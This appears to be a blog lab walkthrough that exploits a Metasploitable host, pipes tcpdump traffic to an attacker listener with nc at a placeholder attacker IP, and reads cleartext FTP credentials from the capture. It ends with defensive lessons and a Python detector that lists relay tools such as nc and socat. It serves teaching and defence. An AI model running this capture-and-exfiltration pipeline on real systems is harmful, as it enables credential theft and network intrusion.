How to Capture Traffic On Target System (Credentials)


Hacky Hack Concept 

The article today is about capturing traffic on a target machine. The scenario we are playing out is this:

1. The attacker machine gains access to the target through an exploit.

2. The attacker captures all traffic on the target machine and automatically sends the data back to the attacking machine.

3. The desired traffic to capture is credentials.

4. From the target machine, a user who has no idea that all traffic is being captured logs on to a service (we are doing an FTP login).

Set up Lab Environment

For my lab environment I have configured it as follows.

a. M1 (Kali), M2 (Metasploitable, primary target), M3 (Metasploitable, FTP server)

b. All machines on a host-only DHCP network


The Process

On M1, start a listener that appends all data it receives to a file called "creds.txt".


In a different terminal I run a known exploit against M2. This is a PoC (Proof of Concept) lab, so it is fine to have a target as vulnerable as Metasploitable. I could have gone with many different exploits; I picked an easy one.

The "java rmi server" exploit is extremely easy to run against Metasploitable, as all you need to set is "rhosts" and "lhost".

Run the exploit and observe the following steps.
1. A Meterpreter session is created. Type "shell".
2. Confirm who you are with "whoami". As root we can set up a packet capture that will grab everything.
3. Type "tcpdump -D". This lists all the interfaces on the target system. You can grab data from all available interfaces, but for our purposes eth0 suffices.
4. Then finally, the line that is so important:
tcpdump -i eth0 -X 2>&1 | nc <attacker IP> <listening port on attacker>

What's happening
I'm using the application tcpdump, setting the interface to eth0, requesting that the hex dump (-X) be included for each packet, redirecting stderr into stdout (2>&1), and piping the output to the connection that is listening on the attacker machine.


Now we need to generate traffic on M2 (target).  We start by sending a few ICMP packets.


Followed by logging into the FTP server located on M3. Remember that FTP is a cleartext protocol, so if we are able to observe these packets we will be able to see the credentials.


I closed the packet capture from the terminal running the Metasploit exploit. Next I check whether there is any data in the "creds.txt" file. Good news, there is! Let's open it up.

This next step can be done with grep just as easily; however, I wanted the visual of Leafpad. Additionally, as with any text editor, Ctrl+F is very useful for finding things.
I search for "user".
BOOM! We got it!


I scroll down a few more packets and I can see my next favourite word, "pass".


Lessons Learned

There are some pieces happening during this data exchange that are important to take note of.

From the offensive side, the ability to grab data in transit on the target is extremely useful. Not only can we gather potential credentials, we can also learn more about the target environment, which is valuable for getting deeper into the network. From a packet capture we can learn about other devices, services and habits occurring within the infrastructure in play.

Yes this example was showing an offensive strategy, however there are some key pieces to pull out here from a defensive standpoint.

1. OS Hardening: Metasploitable is an intentionally vulnerable machine; there are many ways to poke holes in it. So it may seem obvious that we shouldn't be running a machine like this in production. However, many people tolerate the risk of having unpatched hardware in their network environment. Even one weak machine poses a threat to a network, an avenue for attack.

2. Monitoring Logs: Had the user on M2 looked at logs they would have seen some interesting activity. For example, why was there an open connection to another machine? Why was there a constant stream of data to that machine? Why was root doing this? Who was working that day? Were they on this machine? There are many logs to monitor, and they can be put together to give the bigger picture of the event.

3. Authentication: Approved users only, with multiple layers of authentication.

4. Reduce the Attack Vectors: In my lab example I had a perfect scenario: I had vulnerable machines and I was utilizing a cleartext protocol. Now I wish I could say this was abnormal, but truth be told I have literally seen environments like this. Clients have a mentality of "If it ain't broke...." This is a dangerous mentality, and I think people are generally beginning to wake up to the real-world threats.
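Item 2 above says the activity would have been visible to anyone watching the host. The following Python example is added here and is not part of the original post: it parses constructed "ps -eo pid,ppid,user,args" and "ss -tnp" output and flags a capture tool whose sibling process (same parent shell) is a network relay holding an established socket, which is exactly the tcpdump-to-nc pattern used in this lab. The PIDs, tool lists and 192.0.2.x addresses are constructed sample values, not from the post.

```python
import re

# Constructed "ps -eo pid,ppid,user,args" sample: a capture piped to a relay (this post's pattern).
PS_SNAPSHOT = """\
  PID  PPID USER     COMMAND
 1340   812 msfadmin bash
 3105     1 root     /bin/sh
 3210  3105 root     tcpdump -i eth0 -X
 3211  3105 root     nc 192.0.2.10 4444
 3300  1340 msfadmin ping 192.0.2.20
"""
# Constructed "ss -tnp" sample (established TCP sockets with their owning PID).
SS_SNAPSHOT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 192.0.2.5:22 192.0.2.30:51234 users:(("sshd",pid=812,fd=3))
ESTAB 0 0 192.0.2.5:40122 192.0.2.10:4444 users:(("nc",pid=3211,fd=3))
"""
CAPTURE_TOOLS = {"tcpdump", "tshark", "dumpcap", "tcpflow"}
RELAY_TOOLS = {"nc", "ncat", "netcat", "socat"}


def parse_ps(text):
    """Yield (pid, ppid, user, basename of argv[0], full command line) per process."""
    for line in text.splitlines()[1:]:
        pid, ppid, user, cmd = line.split(None, 3)
        yield int(pid), int(ppid), user, cmd.split()[0].rsplit("/", 1)[-1], cmd


def parse_ss(text):
    """Map owning PID -> peer address:port for every ESTAB socket."""
    peers = {}
    for line in text.splitlines()[1:]:
        fields, m = line.split(), re.search(r"pid=(\d+)", line)
        if fields[0] == "ESTAB" and m:
            peers[int(m.group(1))] = fields[4]
    return peers


def find_capture_exfil(ps_text, ss_text):
    """Flag a capture tool whose sibling (same parent shell) is a relay tool holding
    an established socket: the capture output is most likely being piped off-host."""
    peers, by_parent = parse_ss(ss_text), {}
    for proc in parse_ps(ps_text):
        by_parent.setdefault(proc[1], []).append(proc)
    alerts = []
    for siblings in by_parent.values():
        caps = [p for p in siblings if p[3] in CAPTURE_TOOLS]
        relays = [p for p in siblings if p[3] in RELAY_TOOLS and p[0] in peers]
        for cap in caps:
            for rel in relays:
                alerts.append({"user": cap[2], "capture_pid": cap[0], "relay_pid": rel[0],
                               "peer": peers[rel[0]], "pipeline": f"{cap[4]} | {rel[4]}"})
    return alerts
```

On a real host the same check can be fed live output of the two commands, and the "peer" field is what to compare against the list of destinations the machine is expected to talk to.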

Thanks for reading!
Below is a video of the exact same process.


